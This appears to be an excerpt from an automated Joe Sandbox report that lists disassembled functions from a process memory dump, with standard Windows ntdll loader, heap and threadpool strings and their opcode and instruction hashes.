                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                              • API String ID: 0-1245972979
                                                              • Opcode ID: f4794fbf750712bb08c3b9dad004084db6cbfc9ca5596abb69ee9ae4509c6677
                                                              • Instruction ID: 1b14034645017bc8ad04ffd445ea58bfed560aba66b3bad4d231b3687d6bb9fe
                                                              • Opcode Fuzzy Hash: f4794fbf750712bb08c3b9dad004084db6cbfc9ca5596abb69ee9ae4509c6677
                                                              • Instruction Fuzzy Hash: 90612532600B229BD723CF5DC885B6AB7E5FF90B64F14852DE9559F2A0D730E841CB91
                                                              Function 014D64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0153106B
                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01530FE5
                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015310AE
                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01531028
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                              • API String ID: 0-1468400865
                                                              • Opcode ID: d82cde2f26bd6c7058059e73619a3a9ab2b4b24a0dbe94bce0a48fa3b5f47a3d
                                                              • Instruction ID: 9876d5cb5ec6d60e1bab18395244f6ce35aafd9883a385486e4465da7e4352b1
                                                              • Opcode Fuzzy Hash: d82cde2f26bd6c7058059e73619a3a9ab2b4b24a0dbe94bce0a48fa3b5f47a3d
                                                              • Instruction Fuzzy Hash: 8271E1B19043069FDB21DF18C894B9B7FA8BF95764F40046AF9488F29AD334D589CBD2
                                                              Function 014F245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • apphelp.dll, xrefs: 014F2462
                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0153A992
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0153A9A2
                                                              • LdrpDynamicShimModule, xrefs: 0153A998
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-176724104
                                                              • Opcode ID: 87699fecb00e440ea970e9893795eeab091b2ebecba48c12bba41253172cdced
                                                              • Instruction ID: a12b249f341e34e5a4f0474b0cac2ebcb644200e5fe118d98d901c5f1e467de5
                                                              • Opcode Fuzzy Hash: 87699fecb00e440ea970e9893795eeab091b2ebecba48c12bba41253172cdced
                                                              • Instruction Fuzzy Hash: C7316676600202AFDB319F599885EAE7BB4FBC0B04F17402EE960AF365C7F09946D780
                                                              Function 014E0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-4253913091
                                                              • Opcode ID: ac1894de14298987b69d0086b03d7f641ac637a3f2e38567204d7cd98634e2be
                                                              • Instruction ID: cd120a3879275adc9bf4ce274ff1f57de517390bb2afd3a0851f163604a3d9e9
                                                              • Opcode Fuzzy Hash: ac1894de14298987b69d0086b03d7f641ac637a3f2e38567204d7cd98634e2be
                                                              • Instruction Fuzzy Hash: 90F18B30700606DFEB25CF68C898B6AB7F5FF84304F14816AE5669B3A1D774E981CB91
                                                              Function 014F6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $@
                                                              • API String ID: 0-1077428164
                                                              • Opcode ID: ec0c4383d747d73d8715e42804a5b4b197dfea69588ac166b770e2f1876ee8b6
                                                              • Instruction ID: c4b7cdca6c76842cd87c13c3853b302adbbae203198481b5372339e87b314dcf
                                                              • Opcode Fuzzy Hash: ec0c4383d747d73d8715e42804a5b4b197dfea69588ac166b770e2f1876ee8b6
                                                              • Instruction Fuzzy Hash: 6EC28F716083419FE725CF29C880BABBBE5BFC8754F05892EEA8997361D734D805CB52
                                                              Function 014CA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                              • API String ID: 0-2779062949
                                                              • Opcode ID: ef63d5a31b2e46dbc8dd65175afca035d7e1d2d4baefa3d222c2ca2e1cadc8eb
                                                              • Instruction ID: e919587745bd24cdcbc496c14b85dd735d6d1ad78ae4ff1a696fd5edbc5e5204
                                                              • Opcode Fuzzy Hash: ef63d5a31b2e46dbc8dd65175afca035d7e1d2d4baefa3d222c2ca2e1cadc8eb
                                                              • Instruction Fuzzy Hash: B7A17C769012399BDB319F28CC88BAEB7B8FF55710F1005EAD909AB251E7359E84CF50
                                                              Function 014F0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0153A121
                                                              • Failed to allocated memory for shimmed module list, xrefs: 0153A10F
                                                              • LdrpCheckModule, xrefs: 0153A117
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-161242083
                                                              • Opcode ID: 5dc046823d60b9d1c134f6699a7078223a11ab6364b6047821305415178a94c1
                                                              • Instruction ID: 2961bd165e3dd68d0e4549f65fbf4d831726ac235b1166f49e3a2c2cdb378e76
                                                              • Opcode Fuzzy Hash: 5dc046823d60b9d1c134f6699a7078223a11ab6364b6047821305415178a94c1
                                                              • Instruction Fuzzy Hash: CF71F270A006069FDB29DF68C980BBEB7F1FB84704F15402EE552DB366E734AA42CB40
                                                              Function 014E0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-1334570610
                                                              • Opcode ID: 55d13f3fbc62fbd685f4847a0745fd7565104f72a1b634e88bb01efae78f9896
                                                              • Instruction ID: 041d79cfaa53a4df7637dc9335d238c50ef042752f4910077692b7cc9066a572
                                                              • Opcode Fuzzy Hash: 55d13f3fbc62fbd685f4847a0745fd7565104f72a1b634e88bb01efae78f9896
                                                              • Instruction Fuzzy Hash: F86180707103069FDB29CF68C484B6ABBE5FF54705F14855EE4698F2A2D7B0E841CB91
                                                              Function 0150C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015482E8
                                                              • Failed to reallocate the system dirs string !, xrefs: 015482D7
                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 015482DE
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1783798831
                                                              • Opcode ID: ee65f9ef4fc5d739e6050767e4df8b44334c006d4b897aaf73f1c9b391096feb
                                                              • Instruction ID: 2f29b47716a01e7e5d54e7a35898c00a156fd891314909b6f201230dba9895ed
                                                              • Opcode Fuzzy Hash: ee65f9ef4fc5d739e6050767e4df8b44334c006d4b897aaf73f1c9b391096feb
                                                              • Instruction Fuzzy Hash: 3C4120B1100701AFC722EFA9DC44B5B77E8BF64B14F014A2EB9549B2A0EB70E804CB91
                                                              Function 0158C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • PreferredUILanguages, xrefs: 0158C212
                                                              • @, xrefs: 0158C1F1
                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0158C1C5
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                              • API String ID: 0-2968386058
                                                              • Opcode ID: 16a76a45c3012252687972d606b1bf0c0ee183658072168546cb97bfff169f52
                                                              • Instruction ID: cbadc0d37c6bb7d4fce63b816ff7ecb8a5c11f441a22e23a3eb8987e7ef2090c
                                                              • Opcode Fuzzy Hash: 16a76a45c3012252687972d606b1bf0c0ee183658072168546cb97bfff169f52
                                                              • Instruction Fuzzy Hash: D3416871D0021AEBEF11EBD9C841FEEB7B8BB54710F14416AE64ABB290D7749A44CB60
                                                              Function 01564144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                              • API String ID: 0-1373925480
                                                              • Opcode ID: c3f3ea5191d845326c2838d03e285e8ae066dbc0f64d2ac1e039c36dcec68d72
                                                              • Instruction ID: c0ba579fe4253a2b968759b66f49ce43809f4fd131f520d0862147318e342948
                                                              • Opcode Fuzzy Hash: c3f3ea5191d845326c2838d03e285e8ae066dbc0f64d2ac1e039c36dcec68d72
                                                              • Instruction Fuzzy Hash: 1841F332A00659CBEB26DBA9C844BADBBFCFFA5340F24045AD901EF791D7358941CB90
                                                              Function 01554755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01554888
                                                              • LdrpCheckRedirection, xrefs: 0155488F
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01554899
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-3154609507
                                                              • Opcode ID: 2994b04923629059ecb822aa4fe84de883af8c2079ea1dbb9fd90ed368531c40
                                                              • Instruction ID: f93e8468ede03a3cbaf7cd730acb9fc8f8866c71617cce1a27d66bf1bb14a067
                                                              • Opcode Fuzzy Hash: 2994b04923629059ecb822aa4fe84de883af8c2079ea1dbb9fd90ed368531c40
                                                              • Instruction Fuzzy Hash: EE41D132A146519FCBA1CE69D860A2A7BE4BF89A50B06056EED589F311F330D880CB91
                                                              Function 014E0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-2558761708
                                                              • Opcode ID: 858143545e5212e0b067a69f8e12a6c201aed638aa07247ade861114c7d31d0b
                                                              • Instruction ID: 9eed7ee71f58e284f899ba3fbd1cef087b17f26780773fb677874a4380c38bd2
                                                              • Opcode Fuzzy Hash: 858143545e5212e0b067a69f8e12a6c201aed638aa07247ade861114c7d31d0b
                                                              • Instruction Fuzzy Hash: 2F11DF313241029FDB2DCA29C859B7AB3E4FF90A16F19812EF416CF261EB70D841C751
                                                              Function 015520DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01552104
                                                              • LdrpInitializationFailure, xrefs: 015520FA
                                                              • Process initialization failed with status 0x%08lx, xrefs: 015520F3
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2986994758
                                                              • Opcode ID: 5b580ff5f09bc7a2358646ac7f10959d17ba9d6b5f6097990cb85c09d5c36e6d
                                                              • Instruction ID: 6dfb95d8ab0b287631ab2bfdd7a86752d722723ff656a03b7abfef0e50ea2363
                                                              • Opcode Fuzzy Hash: 5b580ff5f09bc7a2358646ac7f10959d17ba9d6b5f6097990cb85c09d5c36e6d
                                                              • Instruction Fuzzy Hash: 50F0C275640309BFE724EA4DDC57FDA37A8FB90B54F65005AFA006F295D2F0AA04CBA1
                                                              Function 014E03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: #%u
                                                              • API String ID: 48624451-232158463
                                                              • Opcode ID: 8473a29792b442578bb21cb6fa614e8f6283b1c6517bb2f5201172cfdacf6fc7
                                                              • Instruction ID: 20d5ad9df0d98e837892d8d64eb252eba2383bcc7411f9734967f166f2cf35e1
                                                              • Opcode Fuzzy Hash: 8473a29792b442578bb21cb6fa614e8f6283b1c6517bb2f5201172cfdacf6fc7
                                                              • Instruction Fuzzy Hash: E8714B71A0014A9FDB01DFA9C994FAEB7F8FF58704F14406AE905EB261EA34ED01CB60
                                                              Function 014DA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrResSearchResource Enter, xrefs: 014DAA13
                                                              • LdrResSearchResource Exit, xrefs: 014DAA25
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                              • API String ID: 0-4066393604
                                                              • Opcode ID: e771060dc3b152cfe8b7bd0c314131bf458fcd381a687b77acbd74e7d89f614e
                                                              • Instruction ID: ddb2d96d84cfa648ba0b2180f2de57cc05b0d4c8119245b1b29a335a8fe705f6
                                                              • Opcode Fuzzy Hash: e771060dc3b152cfe8b7bd0c314131bf458fcd381a687b77acbd74e7d89f614e
                                                              • Instruction Fuzzy Hash: 55E19171E002099FEF22CF99C990BAEBBB9BF44310F20052AEA11EB361D7749941CB51
                                                              Function 0159A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: `$`
                                                              • API String ID: 0-197956300
                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                              • Instruction ID: f4cb6c099fa335843ae97d465b8b1167f4b27f987b33436c7f677b624c23165e
                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                              • Instruction Fuzzy Hash: 3EC1AF312043469BEB25CF28C845B6BBBE5BFD4318F184A2DF6968F290D774D505CBA2
                                                              Function 0154E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Legacy$UEFI
                                                              • API String ID: 2994545307-634100481
                                                              • Opcode ID: 227e58d5dec6eb3e8b3bfe7658df8f23bc65a0d3eabc08d28d1bcdc0c39b924b
                                                              • Instruction ID: 3471ee4d86e91885ae7c84da9a240bde98180db080ea41004271d301d432a0e7
                                                              • Opcode Fuzzy Hash: 227e58d5dec6eb3e8b3bfe7658df8f23bc65a0d3eabc08d28d1bcdc0c39b924b
                                                              • Instruction Fuzzy Hash: DA616C71E002099FEB25DFA9C841BADBBF5FB44714F24446EE649EF251D735A900CB50
                                                              Function 015743D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$MUI
                                                              • API String ID: 0-17815947
                                                              • Opcode ID: c047237e5feac8eba07b383538f7961e2898a973bf61126de58ce3b07ecff6d1
                                                              • Instruction ID: 427a64f618f36db3bfc9c44e5b67fd3272950f0fa54e9416f9b2302dab77faf8
                                                              • Opcode Fuzzy Hash: c047237e5feac8eba07b383538f7961e2898a973bf61126de58ce3b07ecff6d1
                                                              • Instruction Fuzzy Hash: 1E51F871E0021EAEEB11DFA9DC91EEEBBB9FB54754F10052AE611AB290D6309905CB60
                                                              Function 014D04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • kLsE, xrefs: 014D0540
                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 014D063D
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                              • API String ID: 0-2547482624
                                                              • Opcode ID: ab669ea1b5e0cfa650decdc08d6c837ad32ec35f8168c19f9d7044331fc8ac0c
                                                              • Instruction ID: 7fac58530e71fb19f0a4732dc30cf09d41be50cacc63282c0404fd9253d1e486
                                                              • Opcode Fuzzy Hash: ab669ea1b5e0cfa650decdc08d6c837ad32ec35f8168c19f9d7044331fc8ac0c
                                                              • Instruction Fuzzy Hash: 3A51CD715007428FDB24EF29C4646A7BBE4AF85300F10883FFAAA87361E770D545CB92
                                                              Function 014DA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 014DA309
                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 014DA2FB
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                              • API String ID: 0-2876891731
                                                              • Opcode ID: 83284639c6b4240da63c4c81baf339d939f36a1e0041f016d721dc5a1330deef
                                                              • Instruction ID: a961f8ac5209e762ba9e4aa92452c7b529058bb499e43b94d98e0d5c8f613508
                                                              • Opcode Fuzzy Hash: 83284639c6b4240da63c4c81baf339d939f36a1e0041f016d721dc5a1330deef
                                                              • Instruction Fuzzy Hash: C141AD30A04649DBEB16CF59C864B6E7BB5FF95700F2440AAE900DF3A1EBB5D941CB50
                                                              Function 0150A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Cleanup Group$Threadpool!
                                                              • API String ID: 2994545307-4008356553
                                                              • Opcode ID: 2ea9990bdabf8540ea8d1d4c721bb5c033f34e57eaee5d83bf55d474439da1f5
                                                              • Instruction ID: 8535d0041c2fc9ab0e95cebd6eef38870f1cc117d4531617ae1e54816d43ac55
                                                              • Opcode Fuzzy Hash: 2ea9990bdabf8540ea8d1d4c721bb5c033f34e57eaee5d83bf55d474439da1f5
                                                              • Instruction Fuzzy Hash: DF01D1B2644700AFE312DF64CE45B2677F8F795715F018939A659CF190E334D904CB46
                                                              Function 014DC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: MUI
                                                              • API String ID: 0-1339004836
                                                              • Opcode ID: 8568c325d11fe8473a53b0450ab659a2783d305034991186c80f6fc624e9de59
                                                              • Instruction ID: 23eba231ca750dfc35b0f65191d1eb5822f1568260c4502927dfd15e54f44d5a
                                                              • Opcode Fuzzy Hash: 8568c325d11fe8473a53b0450ab659a2783d305034991186c80f6fc624e9de59
                                                              • Instruction Fuzzy Hash: 7D826F75E002199FDF25CFA9C8A0BEEBBB1BF49310F14816ED959AB3A1D7309941CB50
                                                              Function 0157A118 Relevance: 1.8, Strings: 1, Instructions: 591COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @
                                                              • API String ID: 0-2766056989
                                                              • Opcode ID: e52286efe5031850717379b6e448893e30c0ea031dad119256caaab5ab9aa78f
                                                              • Instruction ID: b533478baac9c0a64d3262a1eb754aac990deec2a36ade8a7f8e01cd28eb6c25
                                                              • Opcode Fuzzy Hash: e52286efe5031850717379b6e448893e30c0ea031dad119256caaab5ab9aa78f
                                                              • Instruction Fuzzy Hash: 8622BE706046618FEB25CF29E09677EBBF1BF44300F0C8859E9968F286E335E452CB61
                                                              Function 01556420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 3e7d511de10a51ade2da01b028a0afcf3bbceacf6707429e216f5bcfdfade636
                                                              • Instruction ID: 18ad708e5cce694a66d16bf8f6c68bb1e8d1f3539e1b7d7b8c95b3d5aa76d3b6
                                                              • Opcode Fuzzy Hash: 3e7d511de10a51ade2da01b028a0afcf3bbceacf6707429e216f5bcfdfade636
                                                              • Instruction Fuzzy Hash: B8916372940259AFEB21DF95CC95FAE7BB8FF14750F50405AF700AF2A0D675A900CBA0
                                                              Function 0157E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: bea10998b624e9812b21bbc6fd4ae4fbf696c75ef8c441f1a32720ec9acd424c
                                                              • Instruction ID: 531569b949c7962508a47420dc17d5138cae141484620f91c17cd4bd22d776bd
                                                              • Opcode Fuzzy Hash: bea10998b624e9812b21bbc6fd4ae4fbf696c75ef8c441f1a32720ec9acd424c
                                                              • Instruction Fuzzy Hash: 28918371900606BFDB22AFA5EC46FAFBBB9FF95750F100069F505AB260D774A901CB90
                                                              Function 0150A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: GlobalTags
                                                              • API String ID: 0-1106856819
                                                              • Opcode ID: 35532bcd539c2c3edfbeae61ef40ce74b258497143fa9a222f8e5e3b1441e7f0
                                                              • Instruction ID: da9074c597d8bd657fc275251c89d691de73a55938021ba2b2cdaad8aa56ebe0
